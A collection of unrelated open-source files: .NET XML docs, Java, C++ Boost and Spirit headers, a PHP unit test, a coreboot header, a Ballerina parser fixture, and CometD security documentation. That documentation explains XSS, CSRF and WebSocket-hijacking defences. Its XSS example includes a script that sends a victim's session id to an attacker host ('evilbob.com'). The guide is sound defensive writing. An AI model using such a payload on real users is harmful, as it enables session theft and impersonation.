Keywords for the PlatformEventSource. Those keywords should match keywords in Core.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords.UserActionable">
<summary>
Key word for user actionable events.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule">
<summary>
The module subscribed to AppDomain.CurrentDomain.UnhandledException to send exceptions to ApplicationInsights.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule"/> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Initializes the telemetry module.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Dispose">
<summary>
Disposing UnhandledExceptionTelemetryModule instance.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule">
<summary>
The module subscribed to TaskScheduler.UnobservedTaskException to send exceptions to ApplicationInsights.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Initializes the telemetry module.
</summary>
<param name="configuration">Telemetry Configuration used for creating TelemetryClient for sending exceptions to ApplicationInsights.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Dispose">
<summary>
Disposing TaskSchedulerOnUnobservedTaskException instance.
</summary>
</member>
</members>
</doc>
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2011 Harald Wellmann.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.wicketstuff.osgi.util;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.wicket.WicketRuntimeException;
import org.osgi.framework.BundleContext;
import org.osgi.framework.Filter;
import org.osgi.framework.FrameworkUtil;
import org.osgi.framework.InvalidSyntaxException;
import org.osgi.util.tracker.ServiceTracker;
/**
* A utility class for looking up services from the OSGi registry. The methods of this class wait
* for the service for a given timeout (default 10 seconds) and throw a
* {@code WicketRuntimeException} when no matching service becomes available during this period.
* <p>
* NOTE: Prefixing some method calls with our own class name is a workaround for a bug in the Oracle
* Java compiler, which does not occur when compiling in Eclipse.
*
* @author Harald Wellmann
*
*/
public class OsgiServiceLookup
{
public static final long DEFAULT_TIMEOUT = 10000;
public static <T> T getOsgiService(BundleContext bc, String className)
{
return OsgiServiceLookup.<T> getOsgiService(bc, className, DEFAULT_TIMEOUT, null);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, Map<String, String> props)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT, props);
}
/**
* Returns a service matching the given criteria.
*
* @param <T>
* class implemented or extended by the service
* @param bc
* bundle context for accessing the OSGi registry
* @param type
* class implemented or extended by the service
* @param timeout
* maximum wait period in milliseconds
* @param props
* properties to be matched by the service
* @return matching service (not null)
* @throws WicketRuntimeException
*/
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout,
Map<String, String> props)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, props);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, null);
}
@SuppressWarnings("unchecked")
public static <T> T getOsgiService(BundleContext bc, String className, long timeout,
Map<String, String> props)
{
ServiceTracker tracker = createServiceTracker(bc, className, props);
try
{
tracker.open();
Object svc = tracker.waitForService(timeout);
if (svc == null)
{
throw new WicketRuntimeException("gave up waiting for service " + className);
}
return (T)svc;
}
catch (InterruptedException exc)
{
throw new WicketRuntimeException(exc);
}
finally
{
tracker.close();
}
}
private static ServiceTracker createServiceTracker(BundleContext bc, String className,
Map<String, String> props)
{
if (props == null || props.isEmpty())
{
return new ServiceTracker(bc, className, null);
}
StringBuilder builder = new StringBuilder("(&(objectClass=");
builder.append(className);
builder.append(')');
for (Entry<String, String> entry : props.entrySet())
{
builder.append('(');
builder.append(entry.getKey());
builder.append('=');
builder.append(entry.getValue());
builder.append(')');
}
builder.append(')');
try
{
Filter filter;
filter = FrameworkUtil.createFilter(builder.toString());
ServiceTracker tracker = new ServiceTracker(bc, filter, null);
return tracker;
}
catch (InvalidSyntaxException exc)
{
throw new WicketRuntimeException(exc);
}
}
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#ifndef BOOST_PP_IS_ITERATING
#if !defined(FUSION_MAKE_SET_09162005_1125)
#define FUSION_MAKE_SET_09162005_1125
#include <boost/preprocessor/iterate.hpp>
#include <boost/preprocessor/repetition/enum_params.hpp>
#include <boost/preprocessor/repetition/enum_binary_params.hpp>
#include <boost/preprocessor/repetition/enum_params_with_a_default.hpp>
#include <boost/preprocessor/repetition/repeat_from_to.hpp>
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/container/set/set.hpp>
#include <boost/fusion/support/detail/as_fusion_element.hpp>
#include <boost/fusion/support/pair.hpp>
#if !defined(BOOST_FUSION_DONT_USE_PREPROCESSED_FILES)
#include <boost/fusion/container/generation/detail/preprocessed/make_set.hpp>
#else
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 2, line: 0, output: "preprocessed/make_set" FUSION_MAX_SET_SIZE_STR".hpp")
#endif
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 1)
#define FUSION_HASH #
#endif
namespace boost { namespace fusion
{
struct void_;
namespace result_of
{
template <
BOOST_PP_ENUM_PARAMS_WITH_A_DEFAULT(
FUSION_MAX_VECTOR_SIZE, typename T, void_)
, typename Extra = void_
>
struct make_set;
template <>
struct make_set<>
{
typedef set<> type;
};
}
// XXX:
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
FUSION_HASH if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
FUSION_HASH else
BOOST_CONSTEXPR
FUSION_HASH endif
#else
#if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
#else
BOOST_CONSTEXPR
#endif
#endif
BOOST_FUSION_GPU_ENABLED
inline set<>
make_set()
{
return set<>();
}
#define BOOST_FUSION_AS_FUSION_ELEMENT(z, n, data) \
typename detail::as_fusion_element<BOOST_PP_CAT(T, n)>::type
#define BOOST_PP_FILENAME_1 <boost/fusion/container/generation/detail/pp_make_set.hpp>
#define BOOST_PP_ITERATION_LIMITS (1, FUSION_MAX_VECTOR_SIZE)
#include BOOST_PP_ITERATE()
#undef BOOST_FUSION_ELEMENT
#undef BOOST_FUSION_AS_ELEMENT
}}
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#undef FUSION_HASH
#pragma wave option(output: null)
#endif
#endif // BOOST_FUSION_DONT_USE_PREPROCESSED_FILES
#endif
#else // defined(BOOST_PP_IS_ITERATING)
///////////////////////////////////////////////////////////////////////////////
//
// Preprocessor vertical repetition code
//
///////////////////////////////////////////////////////////////////////////////
#define N BOOST_PP_ITERATION()
namespace result_of
{
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
#define TEXT(z, n, text) , text
struct make_set< BOOST_PP_ENUM_PARAMS(N, T) BOOST_PP_REPEAT_FROM_TO(BOOST_PP_DEC(N), FUSION_MAX_SET_SIZE, TEXT, void_) >
#undef TEXT
{
typedef set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> type;
};
}
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>
make_set(BOOST_PP_ENUM_BINARY_PARAMS(N, T, const& arg))
{
return set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>(
BOOST_PP_ENUM_PARAMS(N, arg));
}
#undef N
#endif // defined(BOOST_PP_IS_ITERATING)
| {
"pile_set_name": "Github"
} |
[[_security]]
== Security
This session discusses the security features of the Bayeux Protocol and the
relationship with common attacks and how you can configure CometD to tighten
your application.
=== Security of the CometD session id
The Bayeux Protocol identifies a particular session (formerly known as "client")
via a session id token, carried in Bayeux messages by the `clientId` field.
The `clientId` field value (i.e. the session id) is generated by the server
when the client sends the handshake request message, and sent back to the
client in the handshake response message (see
xref:_bayeux_meta_handshake[the Bayeux Protocol handshake]).
The client then sends the `clientId` field in every subsequent message to the
server, until disconnection.
The session id is generated using a strong random number generator, and as
such it is not guessable by an evil third party.
An evil user that knows its own session id cannot guess the session id of
another user by just looking at its own session id.
While the non-guessability of the session id is a good starting point, it
is typically not enough, so read on.
=== Security against man-in-the-middle attacks
An evil user may be in the position to observe Bayeux Protocol traffic, as
it is the case for a man-in-the-middle.
The typical solution in this case is to encrypt the traffic between the
client and the server using TLS.
In this way, all the traffic between the client and the server is
encrypted end-to-end and a man-in-the-middle cannot look or otherwise retrieve
someone else's session id.
[[_security_xss]]
=== Security against Cross-Site Scripting (XSS) attacks
A https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)[cross-site scripting attack]
is a particularly important vulnerability of web applications.
A typical example of XSS is the following:
Evil user Bob connects to a chat service that uses CometD.
There, he finds Alice, another user.
Bob sends an evil chat message text to Alice where the text is the following:
====
[source,html]
----
<script type="text/javascript">
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://evilbob.com?stolen=" + $.cometd.getClientId());
xhr.send();
</script>
----
====
As you can see, the script accesses the CometD's session id (via
`$.cometd.getClientId()`).
[NOTE]
====
Removing the method `getClientId()` would not solve the issue, because
the evil script could access the session id in other ways.
For example, by registering an extension, or by otherwise watching
Bayeux messages that come and go for the normal functioning of the
application, or by quickly disconnecting and reconnecting the session, etc.
====
Bob sends that evil message, which reaches the CometD server and gets routed
to Alice. When it arrives on Alice's browser, that script may be run by
the browser if the application is XSS vulnerable.
If the script runs, Bob would be able to steal Alice's session id, send
it to his server `evilbob.com`, where Bob would be able to access it.
[IMPORTANT]
====
If your web application is XSS vulnerable, an attacker can do
a lot more damage than just stealing a CometD session id, so it is of
paramount importance that your web application sanitizes data received
from unknown sources such as other users chat messages.
====
If Bob has stolen Alice's session id, he could craft a Bayeux message
with Alice's session id and send it from his computer, and thereby could
impersonate Alice.
CometD protects from impersonations due to stolen session ids in different
ways, depending on the type of transport used to carry Bayeux messages.
For transports based on HTTP (`long-polling` and `callback-polling`),
CometD sends a HTTP cookie with the handshake response, marked as `HttpOnly`,
called `BAYEUX_BROWSER` (see xref:_java_server_configuration[]).
The CometD implementation, on the server, maps this cookie to a legit
session id during the processing of the handshake request message.
For every subsequent message, the browser will send the `BAYEUX_BROWSER`
cookie to the server and the CometD implementation will
retrieve the session id from legit sessions that have been mapped to the
cookie, rather than from the message (where it could have been altered).
Bob could craft a message with Alice's session id, but the `BAYEUX_BROWSER`
cookie that he will send along with the tampered message will be his,
not Alice's. The CometD implementation will detect this attack and ask
Bob to re-handshake.
If the crafted message does not have any cookie, CometD will ask Bob to
re-handshake.
For transports based on WebSocket (`websocket`), CometD trusts the particular
connection that has been established during the handshake.
The session id is associated to that connection and when a WebSocket message
arrives on that connection, and CometD retrieves the session id from the
association with the connection, rather than from the message (where it
could have been altered).
When the connection is closed, for example for a network failure, CometD
attempts to open another connection.
If the reconnection happens within a short period of time (typically less than
the `maxInterval` configured on the server), then CometD will try to send
messages on the new connection without re-handshaking, but since it's a new
connection that did not process a handshake message, it will not have a
session id associated.
At this point, CometD could ask the client to re-handshake (which involves
some round-trips to be completed, possibly slowing further down the
communication in case of faulty networks), or it could trust the session
id from the message (which would yield faster reconnections, albeit less
secure if the session id is stolen).
This is controlled by the `requireHandshakePerConnection` parameter, see
xref:_java_server_configuration[].
[[_security_csrf]]
=== Security against Cross Site Request Forgery (CSRF) attacks
A https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)[cross site request forgery attack]
is a particularly important vulnerability of web applications.
A typical example of CSRF is the following:
Evil user Bob connects to the chat service at `cometd-chat.com` using CometD. There,
he finds Alice, another user. Bob sends an evil chat message text to Alice where the
text is the following:
====
[source,html]
----
Look at this: https://evilbob.com/cometd
----
====
Alice clicks on the link, her browser opens a new tab to `+https://evilbob.com/cometd+`
and an entertaining HTML page containing a script is downloaded to Alice's browser.
While Alice is looking at Bob's entertaining page, her browser runs an evil script,
which may perform actions on behalf of Alice on the chat service that uses CometD.
For example, Bob could use xref:_security_xss[XSS] to steal Alice's session id and
then craft and send evil messages to the chat service _from Alice's browser_.
Alice's browser will send the existing Alice's `BAYEUX_BROWSER` cookie along with
the evil messages, and to the server the evil messages will be indistinguishable
from legit messages sent by Alice, because they will carry her `BAYEUX_BROWSER`
cookie and her stolen session id.
CometD does not automatically protects against CSRF attacks, but these are easily
counterfeit by configuring the cross-origin filter as explained in
xref:_java_server_configuration_advanced[this section].
Alice's legit messages are sent by a script downloaded from the chat service, and
therefore will have the following HTTP header:
====
[source]
----
Origin: https://cometd-chat.com
----
====
Conversely, Bob's evil script is downloaded from `+https://evilbob.com+` and his
evil messages will have the following HTTP header:
====
[source]
----
Origin: https://evilbob.com
----
====
The application at `cometd-chat.com` can install the cross-origin filter and
configure it to allow requests only from the `cometd-chat.com` origin,
effectively blocking Bob's CSRF attack.
This works because browsers are required to perform a _preflight_ request
before sending a HTTP request to a different target origin.
The preflight request will be intercepted by the cross-origin filter and
denied.
The unsuccessful preflight response instructs the browser that the script
cannot perform any request to that target origin, and the browser will
block the script from making requests to the target domain.
[[_security_cswsh]]
=== Security against Cross-Site WebSocket Hijacking (CSWSH) attacks
Cross-Site WebSocket Hijacking (CSWSH) is a variant of
xref:_security_csrf[Cross-Site Request Forgery] but for the WebSocket protocol.
Similarly to CSRF, Bob tricks Alice to look at a page at
`+https://evilbob.com/cometd+` that downloads an evil script that opens a
WebSocket connection to `+https://cometd-chat.com+` _from Alice's browser_.
A WebSocket connection sends an initial HTTP request to the server.
This initial HTTP request, triggered by Bob's evil script running in Alice's
browser, looks like this:
====
[source]
----
GET /cometd HTTP/1.1
Upgrade: websocket
...
Cookie: BAYEUX_BROWSER=...; JSESSIONID=...
...
Origin: https://evilbob.com
----
====
The initial HTTP request will have Alice's cookies (and possibly Alice's
authentication headers), including the CometD cookie and the HTTP session
cookie.
However, it will have `+Origin: https://evilbob.com+` and not the expected
`+Origin: https://cometd-chat.com+`.
As with the CSRF attack, the application at `cometd-chat.com` can install the
cross-origin filter and configure it to allow requests only from the
`cometd-chat.com` origin, effectively blocking Bob's CSWSH attack.
In this case, the cross-origin filter must be installed _before_ the
WebSocket upgrade mechanism takes place, or the WebSocket upgrade mechanism
must have a way to test against a configured list of allowed origins and
reject the WebSocket connection attempt if the origin is not allowed.
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Customer\Test\Unit\Model\Address\Config;
class ReaderTest extends \PHPUnit\Framework\TestCase
{
/**
* @var \Magento\Customer\Model\Address\Config\Reader
*/
protected $_model;
/**
* @var \Magento\Framework\Config\FileResolverInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_fileResolverMock;
/**
* @var \Magento\Customer\Model\Address\Config\Converter|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_converter;
/**
* @var \Magento\Customer\Model\Address\Config\SchemaLocator
*/
protected $_schemaLocator;
/**
* @var \Magento\Framework\Config\ValidationStateInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_validationState;
protected function setUp()
{
$this->_fileResolverMock = $this->createMock(\Magento\Framework\Config\FileResolverInterface::class);
$this->_fileResolverMock->expects(
$this->once()
)->method(
'get'
)->with(
'address_formats.xml',
'scope'
)->will(
$this->returnValue(
[
file_get_contents(__DIR__ . '/_files/formats_one.xml'),
file_get_contents(__DIR__ . '/_files/formats_two.xml'),
]
)
);
$this->_converter = $this->createPartialMock(
\Magento\Customer\Model\Address\Config\Converter::class,
['convert']
);
$moduleReader = $this->createPartialMock(\Magento\Framework\Module\Dir\Reader::class, ['getModuleDir']);
$moduleReader->expects(
$this->once()
)->method(
'getModuleDir'
)->with(
'etc',
'Magento_Customer'
)->will(
$this->returnValue('stub')
);
$this->_schemaLocator = new \Magento\Customer\Model\Address\Config\SchemaLocator($moduleReader);
$this->_validationState = $this->createMock(\Magento\Framework\Config\ValidationStateInterface::class);
$this->_validationState->expects($this->any())
->method('isValidationRequired')
->willReturn(false);
$this->_model = new \Magento\Customer\Model\Address\Config\Reader(
$this->_fileResolverMock,
$this->_converter,
$this->_schemaLocator,
$this->_validationState
);
}
public function testRead()
{
$expectedResult = new \stdClass();
$constraint = function (\DOMDocument $actual) {
try {
$expected = __DIR__ . '/_files/formats_merged.xml';
\PHPUnit\Framework\Assert::assertXmlStringEqualsXmlFile($expected, $actual->saveXML());
return true;
} catch (\PHPUnit\Framework\AssertionFailedError $e) {
return false;
}
};
$this->_converter->expects(
$this->once()
)->method(
'convert'
)->with(
$this->callback($constraint)
)->will(
$this->returnValue($expectedResult)
);
$this->assertSame($expectedResult, $this->_model->read('scope'));
}
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#if !defined(SPIRIT_SEQUENCE_APR_22_2006_0811AM)
#define SPIRIT_SEQUENCE_APR_22_2006_0811AM
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/home/qi/operator/sequence_base.hpp>
#include <boost/spirit/home/qi/detail/fail_function.hpp>
#include <boost/spirit/home/qi/meta_compiler.hpp>
namespace boost { namespace spirit
{
///////////////////////////////////////////////////////////////////////////
// Enablers
///////////////////////////////////////////////////////////////////////////
template <>
struct use_operator<qi::domain, proto::tag::shift_right> // enables >>
: mpl::true_ {};
template <>
struct flatten_tree<qi::domain, proto::tag::shift_right> // flattens >>
: mpl::true_ {};
}}
namespace boost { namespace spirit { namespace qi
{
template <typename Elements>
struct sequence : sequence_base<sequence<Elements>, Elements>
{
friend struct sequence_base<sequence<Elements>, Elements>;
sequence(Elements const& elements)
: sequence_base<sequence<Elements>, Elements>(elements) {}
private:
template <typename Iterator, typename Context, typename Skipper>
static detail::fail_function<Iterator, Context, Skipper>
fail_function(
Iterator& first, Iterator const& last
, Context& context, Skipper const& skipper)
{
return detail::fail_function<Iterator, Context, Skipper>
(first, last, context, skipper);
}
std::string id() const { return "sequence"; }
};
///////////////////////////////////////////////////////////////////////////
// Parser generators: make_xxx function (objects)
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Modifiers>
struct make_composite<proto::tag::shift_right, Elements, Modifiers>
: make_nary_composite<Elements, sequence>
{};
// ///////////////////////////////////////////////////////////////////////////
// // Define what attributes are compatible with a sequence
// template <typename Attribute, typename Elements, typename Context, typename Iterator>
// struct is_attribute_compatible<Attribute, sequence<Elements>, Context, Iterator>
// : mpl::or_<
// is_convertible<Attribute
// , typename traits::attribute_of<sequence<Elements>, Context, Iterator>::type>
// , traits::is_fusion_sequence_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// , traits::is_container_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// >
// {};
}}}
namespace boost { namespace spirit { namespace traits
{
///////////////////////////////////////////////////////////////////////////
template <typename Elements>
struct has_semantic_action<qi::sequence<Elements> >
: nary_has_semantic_action<Elements> {};
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Attribute, typename Context
, typename Iterator>
struct handles_container<qi::sequence<Elements>, Attribute, Context
, Iterator>
: mpl::true_ {};
}}}
#endif
| {
"pile_set_name": "Github"
} |
# Acknowledgements
This application makes use of the following third party libraries:
## WHUCalendar
Copyright (c) 2016 tiger8888 <seekarmor@139.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Generated by CocoaPods - https://cocoapods.org
| {
"pile_set_name": "Github"
} |
// Distributed under the terms of the MIT license
// Test case submitted to project by https://github.com/practicalswift (practicalswift)
// Test case found by fuzzing
class A{class d<T where f:A{var b{typealias e=a.c | {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0 */
/*
* From coreboot file of same name
*
* Copyright (C) 2014 Google, Inc
*/
#ifndef _ARCH_ASM_LAPIC_H
#define _ARCH_ASM_LAPIC_H
#define LAPIC_DEFAULT_BASE 0xfee00000
#define LAPIC_ID 0x020
#define LAPIC_LVR 0x030
#define LAPIC_TASKPRI 0x080
#define LAPIC_TPRI_MASK 0xff
#define LAPIC_RRR 0x0c0
#define LAPIC_SPIV 0x0f0
#define LAPIC_SPIV_ENABLE 0x100
#define LAPIC_ICR 0x300
#define LAPIC_DEST_SELF 0x40000
#define LAPIC_DEST_ALLINC 0x80000
#define LAPIC_DEST_ALLBUT 0xc0000
#define LAPIC_ICR_RR_MASK 0x30000
#define LAPIC_ICR_RR_INVALID 0x00000
#define LAPIC_ICR_RR_INPROG 0x10000
#define LAPIC_ICR_RR_VALID 0x20000
#define LAPIC_INT_LEVELTRIG 0x08000
#define LAPIC_INT_ASSERT 0x04000
#define LAPIC_ICR_BUSY 0x01000
#define LAPIC_DEST_LOGICAL 0x00800
#define LAPIC_DM_FIXED 0x00000
#define LAPIC_DM_LOWEST 0x00100
#define LAPIC_DM_SMI 0x00200
#define LAPIC_DM_REMRD 0x00300
#define LAPIC_DM_NMI 0x00400
#define LAPIC_DM_INIT 0x00500
#define LAPIC_DM_STARTUP 0x00600
#define LAPIC_DM_EXTINT 0x00700
#define LAPIC_VECTOR_MASK 0x000ff
#define LAPIC_ICR2 0x310
#define GET_LAPIC_DEST_FIELD(x) (((x) >> 24) & 0xff)
#define SET_LAPIC_DEST_FIELD(x) ((x) << 24)
#define LAPIC_LVT0 0x350
#define LAPIC_LVT1 0x360
#define LAPIC_LVT_MASKED (1 << 16)
#define LAPIC_LVT_LEVEL_TRIGGER (1 << 15)
#define LAPIC_LVT_REMOTE_IRR (1 << 14)
#define LAPIC_INPUT_POLARITY (1 << 13)
#define LAPIC_SEND_PENDING (1 << 12)
#define LAPIC_LVT_RESERVED_1 (1 << 11)
#define LAPIC_DELIVERY_MODE_MASK (7 << 8)
#define LAPIC_DELIVERY_MODE_FIXED (0 << 8)
#define LAPIC_DELIVERY_MODE_NMI (4 << 8)
#define LAPIC_DELIVERY_MODE_EXTINT (7 << 8)
unsigned long lapic_read(unsigned long reg);
void lapic_write(unsigned long reg, unsigned long v);
void enable_lapic(void);
void disable_lapic(void);
unsigned long lapicid(void);
int lapic_remote_read(int apicid, int reg, unsigned long *pvalue);
void lapic_setup(void);
#endif
| {
"pile_set_name": "Github"
} |
import {barFraction, barEnd} from "../constants";
export default function barWidth(array) {
const n = array.length;
if (n === 0) return 0;
if (n === 1) return barFraction;
return (barFraction - barEnd * (n - 1)) / n;
}
| {
"pile_set_name": "Github"
} |
{
"kind": "FUNCTION_DEFINITION",
"children": [
{
"kind": "LIST",
"children": []
},
{
"kind": "FUNCTION_KEYWORD",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "IDENTIFIER_TOKEN",
"value": "foo"
},
{
"kind": "FUNCTION_SIGNATURE",
"children": [
{
"kind": "OPEN_PAREN_TOKEN"
},
{
"kind": "LIST",
"children": []
},
{
"kind": "CLOSE_PAREN_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "FUNCTION_BODY_BLOCK",
"children": [
{
"kind": "OPEN_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
},
{
"kind": "LIST",
"children": [
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
},
{
"kind": "COMMENT_MINUTIAE",
"value": "// DecimalNumber FloatingPointTypeSuffix"
},
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
},
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25f"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25F"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25d"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25D"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
